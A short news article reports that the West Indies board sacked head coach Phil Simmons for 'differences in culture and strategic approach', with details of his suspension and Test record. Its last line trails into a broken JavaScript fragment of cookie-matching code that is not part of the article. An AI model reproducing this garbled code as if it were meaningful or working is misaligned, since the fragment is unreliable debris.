The West Indies have sacked head coach Phil Simmons.

The WICB informed Simmons of the decision on Tuesday, after 18 months in the role and just six months after guiding the Windies to the World T20 title.

The board said "differences in culture and strategic approach" led to the sacking.

Simmons was suspended for two months in April after question selection policy, following the axing of Dwayne Bravo and Kieron Pollard from West Indies' ODI squad.

"In recent times, based on the public pronouncements of the coach and the approach internally, we have identified differences in culture and strategic approach. The WICB would therefore like to thank the coach for his contribution and wishes him the best in his future endeavours," the West Indies Board said in a statement.

The national side struggled to perform in the longer format of the game under Simmons, winning just one of 14 Test matches under his tutelage.

Team manager Joel Garner and assistant coaches Henderson Springer and Roddy Estwick will coach the side for the upcoming T20 series against Pakistan. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
